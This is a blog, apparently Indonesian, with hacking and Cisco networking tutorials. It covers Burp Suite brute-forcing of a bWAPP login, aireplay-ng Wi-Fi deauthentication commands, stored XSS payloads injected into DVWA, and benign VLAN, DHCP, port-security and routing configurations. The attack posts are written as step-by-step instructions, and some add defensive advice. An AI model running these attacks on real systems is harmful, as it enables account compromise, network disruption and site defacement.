06 April 2021

Brute Force Attack

 Brute Force Attack is a popular cracking method with tapping Users & Password one by one in a short time using Machine or Tool, for now I going to show you how to hack website using Brute Force to Knowing What Users and Password which is suitable in Database that webapp using Machine or Tool BurpSuite

Step 1. Access website Bwapp which has been installed in your Lab, and now we try to input wrong user and password, to know what response provided by web, and now we already know the keyword response is Invalid 



Step 2. Now input again user and password with intercept is on in burpsuite, after the traffic already intercept right click and select Send to Intruder 



Step 3. The default will showing like this



Step 4. Now we change like the picture below
Attack Type    : Cluster Bomb
Login              : $admin$
Password        : $admin$



Step 5. Click tab payloads this is for users
Payload set        : 1 
Payload type      : Simple List 
Payload Options: (add all user or if you have wordlist upload to burpsuite) 



Step 6. Keep in the tab payload but this is for passwords
Payload set     : 2 
Payload Type     : Simple List 
Payload Options : (add all password or if you have wordlist upload to burpsuite) 



Step 8. Click tab Options, and look at Grep Match, add the response of the webapp, and then click Start Attack Example : Invalid



Step 9. The burpsuite will check one by one users and passwords, if ther is user and password match look at Invalid will showing uncheck, the webapp no response keyword invalid 



Step 10. Now we try to login to the webapp, and the result we can login using user : bee and password : bug


If you have Website and you want prevent from this attack you can using WAF or you can using Captcha, so if there are Traffic attack to your website using Brute Force, WAF or Captcha can identify that traffic is BruteForce in a way if there are User try to login 5 wrong times in a row within 1 minutes WAF and Captcha can identify and will block or appears the Captcha Authentication 


Thank You

04 April 2021

How to DOS Attack Wifi

So in this section i want to share you how to DOS Attack on Wifi using Kali Linux, this article purpose only to learning and knowledge, or if we want to kick users of the your Wifi network. For the first time we need installed Kali Linux on Raspberry or Vm, if using Vm we need adaptor Wifi External, if Kali linux already installed for now we are access Kali Linux and login

Step 1. Open up terminal and type #iwconfig this command to check your interface Wifi


Step 2. Type #airmon-ng start wlan0 to change mode to be Monitor


Step 3. in this step we lock your wireless specific ssid we want to attack with type #airodump-ng (name of your wireless interface) for example #airodump-ng wlan0mon


Step 4. still continue step 3 with type #airodump-ng --channel (Channel of Access Point under CH) --bssid (BSSID Mac Address from Access Point) (name of your interface) for example #airodump-ng --channel 6 --bssid E4:47:B3:94:F6:8E wlan0mon , and we can see clients connected to the Wifi BaCan under Station tab


Step 5. for the last step we start to DOS Attack to Wifi which we have chosen, there are 2 ways we can attack all clients or specific client to kick on the Wifi Network, if we want to all clients kick on the Wifi network with type #airplay-ng -0 0 -a (Mac Address of Access Point) (Name of your interface) example #aireplay-ng -0 0 -a E4:47:B3:94:F6:8E wlan0mon

If we want to specific client we need type #aireplay-ng --deauth 2000 -a (Mac Address of Access Point) -c (Mac Address of Client) (Name of your interface)
example #aireplay-ng --deauth 2000 -a E4:47:B3:94:F6:8E -c 18:26:77:00:B8:71 wlan0mon after run that command we see the client that is connected to wifi is it still connected or has been disconnected, if you want to check on Kali linux you just type the command 
#airodump-ng --channel 6 --bssid E4:47:B3:94:F6:8E wlan0mon


THANK YOU


25 September 2018

Tutorial Hack Web Server Menggunakan Metode Cross Site Scripting Stored



Tutorial Hack Web Server Menggunakan Metode Cross Site Scripting Stored

by Aldi Pratama


Cross Site Scripting adalah salah satu jenis serangan injeksi kode ke dalam Web Server, Cross Site Scripting dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
Type Cross Site Scripting :

·         Reflected
·         Stored
Reflected :
Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.
Mekanisme pertahanan menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data apapun yang di-generate oleh pengguna. Jangan percayai apapun data yang dikirim oleh pengguna.
Stored :
Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.
Serangan ini lebih menakutkan. Mekanisme pertahanannya sama dengan reflected XSS: jika pengguna diizinkan untuk memasukkan data, lakukan validasi sebelum disimpan pada aplikasi.
Nah untuk kesempatan kali ini saya akan memberikan caranya untuk melakukan Cross Site Scripting dengan menggunakan metode Stored, pertama kita siapkan Web Server yang saya gunakan untuk pantest ini saya menggunakan Web DVWA Vulnerability, langsung saja saya berikan contohnya di bawah ini :
1.    Setelah WebVulnerability telah siap untuk di akses kita akses menggunakan web browser dan ketikan Ip Address Web Server. Setelah itu klik tab XSS Stored, dan ada sebuah inputan untuk mengisi Name dan Massage
·         Name              :           Test 1
·         Massage         :           <sCrIpT>alert(“Test XSS”);</sCrIpT>
Setelah itu Klick Sign Guestbook untuk execute script tersebut

Dan efek dari Script tersebut akan seperti gambar di bawah ini


Setelah itu kita coba menggunakan Script Iframe untuk di inject di web tersebut dan akan menampilkan efek attack yang berbeda, metodenya sama seperti yang pertama hanya script-nya saja yang berbeda

·         Name              : test 2

·         Message         : <iframe src="https://alpratamanetwork.blogspot.co.id"></iframe>


     Dan efeknya akan muncul sebuah web lain yang telah di input links di dalam script iframe tersebut

1.    Berikut saya akan contohkan lagi script lain yang berbeda untuk script ini akan merubah keseluruhan tampilan web yang di attack
·         Name              : test3
·         Message         : <div style="position:fixed;top:0;left:0;width:100%;height:100%;background-color:green;z-index:9999;" onmouseover="prompt(document.domain)"/>
1.    Dan efeknya akan seperti gambar berikut, jika kalian seorang programer kalian bisa memodifikasi lagi script tersebut dengan script yang lain agar tampilannya bisa berbeda atau memasukan gambar menjadi gambar anonymous mungkin sekian tutorial dari saya untuk pantest menggunakan cross site scripting stored

Recomendasi untuk mengatasi masalah untuk serangan ini :

Hal ini diperlukan untuk meningkatkan validasi input pengguna dalam parameter rentan, dengan menolak karakter yang tidak diinginkan di bidang input (misalnya 5 karakter XML yang signifikan: <> & "'), atau menyandikannya sebelum mengembalikannya ke halaman. Ada beberapa skema encoding yang dapat digunakan tergantung di mana konten pengguna dimasukkan, tetapi skema pengodean keluaran entitas HTML paling dasar adalah:
<          →        & lt;
>          →        & gt;
&          →        & amp;
"           →        & # 034;
'           →        & # 039;
Sebagai contoh, dengan enkode yang diterapkan dengan benar, input pengguna <script> </ script> harus dikodekan sebelum rendering ke halaman sebagai & lt; script & gt; & lt; / script & gt; atau jika karakter khusus dihapus dari input pengguna, itu akan dikembalikan ke halaman sebagai skrip / skrip.
Diperlukan juga penggunaan strategi pemfilteran masukan yang positif ("penerimaan dikenal baik"), yaitu, gunakan daftar putih input yang dapat diterima yang benar-benar sesuai dengan spesifikasi yang ditentukan misalnya. panjang minimum dan maksimum, dan jenis parameter sintaks / data yang benar (misalnya hanya menerima nilai numerik dengan panjang dari 1 hingga 11 karakter) dan menolak masukan apa pun yang tidak benar-benar sesuai dengan spesifikasi, atau secara opsional mengubahnya menjadi sesuatu yang memiliki. Pengembang aplikasi harus dapat menentukan pola validasi yang sangat kuat - biasanya berdasarkan ekspresi reguler - untuk memvalidasi data masukan yang terstruktur dengan baik, seperti tanggal, nomor akun, kode pos, alamat email, dll.
Jangan hanya mengandalkan validasi masukan daftar hitam. Blacklist juga dapat berguna untuk mendeteksi serangan potensial atau menentukan masukan mana yang sangat salah sehingga mereka harus ditolak mentah-mentah, tetapi pencegahan XSS tidak boleh hanya mengandalkan mencari masukan jahat atau salah bentuk.


Referensi Links :
https://id.wikipedia.org/wiki/XSS





26 February 2017

Tutorial vlan dan intervlan dan dhcp router cisco


TUTORIAL VLAN, INTER VLAN, & DHCP ROUTER CISCO
by Aldi Pratama


Dengan adanya teknologi VLAN kita bisa memisahkan atau mengelompokan client sesuai kebutuhan masing-masing, jadi jika kita membuat VLAN di switch yang terdiri dari client jurusan tkj, rpl. dan mm bisa di kelompokan dalam satu switch dengan Ip network berbeda.
Langsung saja kita lanjut ke konfigurasinya, pertama kita harus mengetahui terlebih dahulu topologinya agar bisa lebih memahami apa yang sedang kita konfigurasikan
Oke pertama kita klik Switchnya, jika Switch sungguhan jangan asal klik ya harus memakai kabel serial dan kita remote menggunakan aplikasi Putty

Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.

A.MEMBUAT VLAN & NAMA VLAN

Switch(config)#vlan 10
Switch(config-vlan)#name tkj
Switch(config-vlan)#vlan 20
Switch(config-vlan)#name rpl
Switch(config-vlan)#vlan 30
Switch(config-vlan)#name mm
Switch(config-vlan)#exi

B.MENENTUKAN PORT UNTUK VLAN

Switch(config)#interface range fastEthernet 0/1 - 2
Switch(config-if-range)#switchport mode access
Switch(config-if-range)#switchport access vlan 10
Switch(config-if-range)#exi
Switch(config)#int ra fa 0/3 - 4
Switch(config-if-range)#switchport mode access
Switch(config-if-range)# switchport access vlan 20
Switch(config-if-range)#exi
Switch(config)#int ra fa 0/5 - 6
Switch(config-if-range)# switchport mode access
Switch(config-if-range)# switchport access vlan 30
Switch(config-if-range)#exi
Switch(config)#
Switch#

Lalu kita beri Ip pada masing-masing pc seperti tabel ini :
Computer
Name Vlan
Ip address
Gateway
PC 0
VLAN 10 (TKJ)
192.168.10.2
192.168.10.1
PC 1
VLAN 10 (TKJ)
192.168.10.3
192.168.10.1
PC 3
VLAN 20 (RPL)
192.168.20.2
192.168.20.1
PC 4
VLAN 20 (RPL)
192.168.20.3
192.168.20.1
PC 5
VLAN 30 (MM)
192.168.30.2
192.168.30.1
PC 6
VLAN 30 (MM)
192.168.30.3
192.168.30.1

Coba kalian lakukan ping atau kirim pesan pada masing-masing VLAN ke VLAN lain misal dari VLAN tkj ke VLAN rpl apakah berhasil atau tidak ? pastinya tidak karna sudah berbeda network dan beda beda VLAN, solusinya agar masing-masing VLAN bisa terkoneksi caranya dengan menggunakan Router, kita tambahkan router seperti di gambar ini
Langsung saja kita konfigurasi si Routernya agar antar VLAN bisa saling terkoneksi

ROUTER

Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#interface fa 0/0
Router(config-if)#no shutdown
Router(config-if)#exi
Router(config)#int fa 0/0.10
Router(config-subif)#encapsulation dot1Q 10
Router(config-subif)#ip address 192.168.10.1 255.255.255.0
Router(config-subif)#exi
Router(config)#int fa 0/0.20
Router(config-subif)#encapsulation dot1Q 20
Router(config-subif)#ip add 192.168.20.1 255.255.255.0
Router(config-subif)#exi
Router(config)#int fa 0/0.30
Router(config-subif)#encapsulation dot1Q 30
Router(config-subif)#ip add 192.168.30.1 255.255.255.0
Router(config-subif)#exi
Router(config)#

SWITCH KITA MODE TRUNK AGAR BISA TERHUBUNG DENGAN ROUTER

Switch(config)#int fa 0/10
Switch(config-if)#switchport mode trunk
Switch(config-if)#exi
Switch(config)#

Selanjutnya kita cek apakah konfigurasi kita berhasil apa tidak coba kita lakukan ping atau mengirim pesan jika Successful atau Reply maka konfigurasi kita berhasil seprti gambar ini

Jika kalian ingin Ip-nya tidak di buat static maka buat konfigurasi DHCP di router agar mendapat Ip Otomatis pada masing-masing komputer yang berada di VLAN, berikut caranya kita klik Router terlebih dahulu dan ketikan konfigurasi seperti berikut
Karna kita tidak ada sebuah server maka saya di sini ngasal saja mengisi DNS-SERVER-nya saya disini mengisi Ip server google, jika di kosongkan pun tidak apa-apa, tetapi jika kita konfigurasi tetapi ada 1 buah server maka kita masukan Ip address si Server tersebut

ROUTER

Router(config)#ip dhcp pool tkj
Router(dhcp-config)#default-router 192.168.10.1
Router(dhcp-config)#network 192.168.10.0 255.255.255.0
Router(dhcp-config)#dns-server 8.8.8.8
Router(dhcp-config)#exi
Router(config)#ip dhcp pool rpl
Router(dhcp-config)#default-router 192.168.20.1
Router(dhcp-config)#network 192.168.20.0 255.255.255.0
Router(dhcp-config)#dns-server 8.8.8.8
Router(dhcp-config)#exi
Router(config)#ip dhcp pool mm
Router(dhcp-config)#def
Router(dhcp-config)#default-router 192.168.30.1
Router(dhcp-config)#network 192.168.30.0 255.255.255.0
Router(dhcp-config)#dns-server 8.8.8.8
Router(dhcp-config)#exi

Router(config)#

Coba kita cek di masing-masing Pc apakah sudah mendapatkan Ip secara otomatis apa belum, ini dia hasil-nya

PC 0 vlan 10

PC 2 vlan 20


PC 4 vlan 30




SEMOGA BERMANFAAT

24 February 2017

Tutorial Port Security Switch Cisco

TUTORIAL PORT SECURITY SWITCH CISCO
by Aldi Pratama


Port Security pada Switch Cisco, fungsinya agar kita bisa mengatur port yang di gunakan atau yang telah kita setting, jadi jika ada orang lain yang mencolokan kabel ke switch yang telah di amankan maka orang tersebut tidak akan bisa connect karena port tersebut telah di amankan untuk Pc yang semestinya.
Ada 3 violation yang bisa kita pilih ketika suatu port pada switch di gunakan oleh Pc yang tidak semestinya

  1. Protect        : data yang dikirim melalui port tersebut akan dibiarkan tidak di kirimkan.
  2. Restrict       : seperti protect namun dengan mengirimkan notifikasi dengan snmp.
  3. Shutdown   : port-nya akan di shutdown secara otomatis, untuk mengembalikannya shutdown                        lagi portnya secara manual, kemudian no shutdown kembali.
Sebelumnya masing-masing Pc kita beri Ip, dan lakukan cek kirim pesan apakah successful apa tidak, jika telah successful seperti gambar di bawah selanjutnya kita konfigurasi Port Security pada switch

Pertama kita klik switchnya dan kita konfigurasi

Switch>en
Switch#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa 0/1
Switch(config-if)#switchport mode access
Switch(config-if)#switchport port-security
Switch(config-if)#switchport port-security mac-address sticky
Switch(config-if)#switchport port-security violation restrict
Switch(config-if)#exi
Switch(config)#int fa 0/2
Switch(config-if)#switchport mode access
Switch(config-if)#switchport port-security
Switch(config-if)#switchport port-security mac-address sticky
Switch(config-if)#switchport port-security violation shutdown
Switch(config-if)#exi
Switch(config)#int fa 0/3
Switch(config-if)#switchport mode access
Switch(config-if)#switchport port-security
Switch(config-if)#switchport port-security mac-address sticky
Switch(config-if)#switchport port-security violation protect
Switch(config-if)#exit
Switch(config)#

untuk melihat hasil konfigurasi Port Security
Setelah itu cara pengetesannya kita ubah port pada masing-masing Pc yang tersambung dengan switch, dan coba ping kembali atau kirim pesan.
Jika telah gagal mengirim pesan seperti gambar di atas maka konfigurasi kita berhasil, terlihat pada interface eth 0/2 bertanda merah itu menandakan bahwa portnya telah di shutdown secara otomatis karna sebelumnya saat kita konfigurasi pada interface 0/2 kita memberi perintah shutdown


SEMOGA BERMANFAAT


Routing Ospf, Eigrp, RIP


TUTORIAL ROUTING OSPF, EIGRP, RIP
by Aldi Pratama

A.OSPF

OSPF adalah link state routing protocol, router tahu persis topologi dari network sehingga memperkecil kesalahan dalam keputusan melakukan routing.
OSPF mempunyai banyak fitur dan semua itu untuk menjadikannya protocol yang cepat, OSPF idealnya di desain secara hierarchical, yang intinya kita dapat membagi alasan untuk membuat OSPF di desain secara hierarchial :
  1. Menurunkan routing overhead
  2. Mempercepat convergence
  3. membatasi network yang tidak stabil agar tidak menyebar ke area lain
OSPF menggunakan cost untuk menentukan jalur terbaiknya

B.EIGRP

EIGRP (Enhanced Interior Gateway Routing Protocol) adalah routing protocol yang hanya di adopsi oleh router cisco atau sering disebut sebagai proprietary protocol pada cisco. Dimana EIGRP ini hanya bisa digunakan sesama router cisco saja. Bagaimana bila router cisco digunakan dengan router lain seperti Juniper, Hwawei, dll menggunakan EIGRP??? Seperti saya bilang diatas, EIGRP hanya bisa digunakan sesama router cisco saja. EIGRP ini sangat cocok digunakan utk midsize dan large company. Karena banyak sekali fasilitas-fasilitas yang diberikan pada protocol ini.
Hal-hal dasar yang perlu diketahui
EIGRP sering disebut juga hybrid-distance-vector routing protocol, karena EIGRP ini terdapat dua tipe routing protocol yang digunakan, yaitu:
  1. distance vector, dan
  2. link state.

C.RIP

RIP yang merupakan routing protokol dengan algoritma distance vector, yang menghitung jumlah hop (count hop) sebagai routing metric. Jumlah maksimum dari hop yang diperbolehkan adalah 15 hop. Tiap RIP router saling tukar informasi routing tiap 30 detik, melalui UDP port 520. Untuk menghindari loop routing, digunakan teknik split horizon with poison reverse. RIP merupakan routing protocol yang paling mudah untuk di konfigurasi.
RIP memiliki 3 versi yaitu :
  1. RIPv1 merupakan bagian dari distance vektor yang mencari hop terpendek atau router terbaik,rip versi 1 juga merupakan class pul routing.
  2. RIPv2 merupakan bagian dari distance vektor yang mencari hop terpendek atau router terbaik,rip versi2 juga merupakan class list routing.
  3. RIPng


D.Konfigurasi

Pertama kita harus mengetahui terlebih dahulu Topologinya

 Selanjutnya kita konfigurasi di daerah yang berwarna hijau, pada topologi ini kita menggunakan routing OSPF 10 area 0
Daftarkan Ip router yang berada di router 1

aldiR1>en
aldiR1#conf terminal
Enter configuration commands, one per line. End with CNTL/Z.
aldiR1(config)#int fa 0/0
aldiR1(config-if)#ip address 192.168.3.1 255.255.255.0
aldiR1(config-if)#no shut
aldiR1(config-if)#exi
aldiR1(config)#int se 2/0
aldiR1(config-if)#ip address 12.12.12.2 255.255.255.0
aldiR1(config-if)#no shut
aldiR1(config-if)#exi
aldiR1(config)#int se 3/0
aldiR1(config-if)#ip add 10.10.10.1 255.255.255.0
aldiR1(config-if)#no shut
aldiR1(config-if)#exi
aldiR1(config)#
aldiR1#           

Setelah itu Daftarkan Ip di Router 2

aldiR2>en
aldiR2#conf t
Enter configuration commands, one per line. End with CNTL/Z.
aldiR2(config)#int fa 0/0
aldiR2(config-if)#ip add 192.168.2.1 255.255.255.0
aldiR2(config-if)#no shut
aldiR2(config-if)#exi
aldiR2(config)#int se 2/0
aldiR2(config-if)#ip add 12.12.12.1 255.255.255.0
aldiR2(config-if)#no shut
aldiR2(config-if)#
aldiR2(config-if)#exi
aldiR2(config)#int se 3/0
aldiR2(config-if)#ip add 11.11.1
aldiR2(config-if)#ip add 11.11.11.1 255.255.255.0
aldiR2(config-if)#no shut
aldiR2(config-if)#exi
aldiR2(config)#

Lalu daftar kan Ip di Router 3

aldiR3(config)#int fa 1/0
aldiR3(config-if)#ip add 192.168.1.1 255.255.255.0
aldiR3(config-if)#no shut
aldiR3(config-if)#
aldiR3(config-if)#exi
aldiR3(config)#int se 2/0
aldiR3(config-if)#ip add 11.11.11.2 255.255.255.0
aldiR3(config-if)#no shut
aldiR3(config-if)#exi
aldiR3(config)#int se 3/0
aldiR3(config-if)#ip add 10.10.10.2 255.255.255.0
aldiR3(config-if)#no shut
aldiR3(config-if)#exi
aldiR3(config)#int fa 0/0
aldiR3(config-if)#ip add 172.16.30.1 255.255.255.252
aldiR3(config-if)#no shut
aldiR3(config-if)#exi
aldiR3(config)#

Setelah itu kita Routing OSPF di router 1, 2,& 3

aldiR1(config)#router ospf 10
aldiR1(config-router)#net 192.168.3.0 0.0.0.255 area 0
aldiR1(config-router)#net 12.12.12.0 0.0.0.255 area 0
aldiR1(config-router)#net 10.10.10.0 0.0.0.255 area 0
aldiR1(config-router)#exit
aldiR1(config)#

aldiR2(config)#router ospf 10
aldiR2(config-router)#net 192.168.2.0 0.0.0.255 area 0
aldiR2(config-router)#net 12.12.12.0 0.0.0.255 area 0
aldiR2(config-router)#net 11.11.11.0 0.0.0.255 area 0
aldiR2(config-router)#exit
aldiR2(config)#

aldiR3(config)#router ospf 10
aldiR3(config-router)#net 192.168.1.0 0.0.0.255 area 0
aldiR3(config-router)#net 11.11.11.0 0.0.0.255 area 0
aldiR3(config-router)#net 10.10.10.0 0.0.0.255 area 0
aldiR3(config-router)#net 172.16.30.0 0.0.0.3 area 0
aldiR3(config-router)#exi
aldiR3(config)#

Selanjutnya kita konfigurasi di daerah yang berwarna ungu, pada topologi ini kita menggunakan routing EIGRP 100

Daftarkan Ip router yang berada di router 4, 5, & 6


aldiR4(config)#int fa 0/0
aldiR4(config-if)#ip add 192.168.4.1 255.255.255.0
aldiR4(config-if)#no shut
aldiR4(config-if)#exi
aldiR4(config)#int se 2/0
aldiR4(config-if)#ip add 14.14.14.1 255.255.255.0
aldiR4(config-if)#no shut
aldiR4(config-if)#exi
aldiR4(config)#int se 3/0
aldiR4(config-if)#ip add 13.13.13.2 255.255.255.0
aldiR4(config-if)#no shut
aldiR4(config-if)#exi
aldiR4(config)#

aldiR5(config)#int fa 0/0
aldiR5(config-if)#ip add 192.168.6.1 255.255.255.0
aldiR5(config-if)#no shut
aldiR5(config-if)#exit
aldiR5(config)#int se 2/0
aldiR5(config-if)#ip add 14.14.14.2 255.255.255.0
aldiR5(config-if)#no shut
aldiR5(config-if)#exit
aldiR5(config)#int se 3/0
aldiR5(config-if)#ip add 15.15.15.1 255.255.255.0
aldiR5(config-if)#no shut
aldiR5(config-if)#exit
aldiR5(config)#

aldiR6(config)#int fa 1/0
aldiR6(config-if)#ip add 192.168.5.1 255.255.255.0
aldiR6(config-if)#no shut
aldiR6(config-if)#exit
aldiR6(config)#int se 3/0
aldiR6(config-if)#ip add 13.13.13.1 255.255.255.0
aldiR6(config-if)#no shut
aldiR6(config-if)#exit
aldiR6(config)#int se 2/0
aldiR6(config-if)#ip add 15.15.15.2 255.255.255.0
aldiR6(config-if)#no shut
aldiR6(config-if)#exit
aldiR6(config)#int fa 0/0
aldiR6(config-if)#ip add 172.16.30.5 255.255.255.252
aldiR6(config-if)#no shut
aldiR6(config-if)#exit
aldiR6(config)#

Setelah itu kita Routing EIGRP di Router 4, 5, & 6

aldiR4(config)#router eigrp 100
aldiR4(config-router)#net 192.168.4.0
aldiR4(config-router)#net 14.14.14.0
aldiR4(config-router)#net 13.13.13.0
aldiR4(config-router)#no auto-summary
aldiR4(config-router)#exit
aldiR4(config)#

aldiR5(config)#router eigrp 100
aldiR5(config-router)#net 192.168.6.0
aldiR5(config-router)#net 14.14.14.0
aldiR5(config-router)#net 15.15.15.0
aldiR5(config-router)#no auto-summary
aldiR5(config-router)#exit
aldiR5(config)#

aldiR6(config)#router eigrp 100
aldiR6(config-router)#net 13.13.13.0
aldiR6(config-router)#net 15.15.15.0
aldiR6(config-router)#net 192.168.5.0
aldiR6(config-router)#net 172.16.30.4
aldiR6(config-router)#no auto-summary
aldiR6(config-router)#exit
aldiR6(config)#

Selanjutnya kita konfigurasi di daerah yang berwarna biru, pada topologi ini kita menggunakan routing RIPv2

Daftarkan Ip router yang berada di router 7, 8, & 9


aldiR7(config)#int fa 0/0
aldiR7(config-if)#ip add 172.16.30.9 255.255.255.252
aldiR7(config-if)#no shut
aldiR7(config-if)#exi
aldiR7(config)#int fa 1/0
aldiR7(config-if)#ip add 202.100.1.1 255.255.255.0
aldiR7(config-if)#no shut
aldiR7(config-if)#exi
aldiR7(config)#int se 2/0
aldiR7(config-if)#ip add 100.10.30.1 255.255.255.0
aldiR7(config-if)#no shut
aldiR7(config-if)#ex
aldiR7(config)#int se 3/0
aldiR7(config-if)#ip add 100.10.10.1 255.255.255.0
aldiR7(config-if)#no shut
aldiR7(config-if)#exi
aldiR7(config)#

aldiR8(config)#int fa 0/0
aldiR8(config-if)#ip add 202.100.2.1 255.255.255.0
aldiR8(config-if)#no shu
aldiR8(config-if)#exi
aldiR8(config)#int se 2/0
aldiR8(config-if)#ip add 100.10.30.2 255.255.255.0
aldiR8(config-if)#no shu
aldiR8(config-if)#exi
aldiR8(config)#int se 3/0
aldiR8(config-if)#ip add 100.10.20.2 255.255.255.0
aldiR8(config-if)#no shut
aldiR8(config-if)#exi
aldiR8(config)#

aldiR9(config)#int fa 0/0
aldiR9(config-if)#ip add 202.100.3.1 255.255.255.0
aldiR9(config-if)#no shut
aldiR9(config-if)#
aldiR9(config-if)#exi
aldiR9(config)#int se 2/0
aldiR9(config-if)#ip add 100.10.20.1 255.255.255.0
aldiR9(config-if)#no shut
aldiR9(config-if)#exi
aldiR9(config)#int se 3/0
aldiR9(config-if)#ip add 100.10.10.2 255.255.255.0
aldiR9(config-if)#no shut
aldiR9(config-if)#exi
aldiR9(config)#

Setelah itu kita Routing RIPv2 di Router 7, 8, & 9


aldiR7(config)#router rip
aldiR7(config-router)#version 2
aldiR7(config-router)#net 172.16.30.8
aldiR7(config-router)#net 202.100.1.0
aldiR7(config-router)#net 100.10.30.0
aldiR7(config-router)#net 100.10.10.0
aldiR7(config-router)#no auto-summary
aldiR7(config-router)#exi
aldiR7(config)#


aldiR8(config)#router rip
aldiR8(config-router)#ver 2
aldiR8(config-router)#net 202.100.2.0
aldiR8(config-router)#net 100.10.30.0
aldiR8(config-router)#net 100.10.20.0
aldiR8(config-router)#no auto-summary
aldiR8(config-router)#exi
aldiR8(config)#

aldiR9(config)#router rip
aldiR9(config-router)#ver 2
aldiR9(config-router)#net 202.100.3.0
aldiR9(config-router)#net 100.10.20.0
aldiR9(config-router)#net 100.10.10.0
aldiR9(config-router)#no auto-summary
aldiR9(config-router)#exi
aldiR9(config)#

Langkah terakhir kita konfigurasi di daerah yang berwarna kuning, di router ini kita akan menyatukan routing OSPF, EIGRP, dan RIP dengan menggunakan Redistribution agar masing-masing routing bisa saling terkoneksi.

Daftarkan Ip router yang berada di ether 0/0, 1/0, 2/0

Router>en
Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#hostname aldiR10
aldiR10(config)#int fa 0/0
aldiR10(config-if)#ip add 172.16.30.2 255.255.255.252
aldiR10(config-if)#no shut
aldiR10(config-if)#exi
aldiR10(config)#int fa 1/0
aldiR10(config-if)#ip add 172.16.30.6 255.255.255.252
aldiR10(config-if)#no shu
aldiR10(config-if)#exi
aldiR10(config)#int fa 2/0
aldiR10(config-if)#ip add 172.16.30.10 255.255.255.252
aldiR10(config-if)#no shu
aldiR10(config-if)#exi
aldiR10(config)#

Setelah itu kita konfigurasi redistribution

aldiR10(config)#router ospf 10
aldiR10(config-router)#net 172.16.30.0 0.0.0.3 area 0
aldiR10(config-router)#redistribute rip subnets tag 1
aldiR10(config-router)#redistribute eigrp 100 subnets
aldiR10(config-router)#exi
aldiR10(config)#router eigrp 100
aldiR10(config-router)#net 172.16.30.4
aldiR10(config-router)#
aldiR10(config-router)#redistribute ospf 10 metric 1 1 1 1 1
aldiR10(config-router)#redistribute rip metric 1 1 1 1 1
aldiR10(config-router)#exi
aldiR10(config)#router rip
aldiR10(config-router)#ver 2
aldiR10(config-router)#net 172.16.30.8
aldiR10(config-router)#redistribute ospf 10 metric 1
aldiR10(config-router)#redistribute eigrp 100 metric 1
aldiR10(config-router)#exi
aldiR10(config)#

Setelah semua router kita konfigurasi selanjutnya kita cek dengan menggunakan Ping/Mengirim pesan jika Reply maka konfigurasi kita berhasil seperti contoh gambar di bawah ini yang telah kita test



SEMOGA BERMANFAAT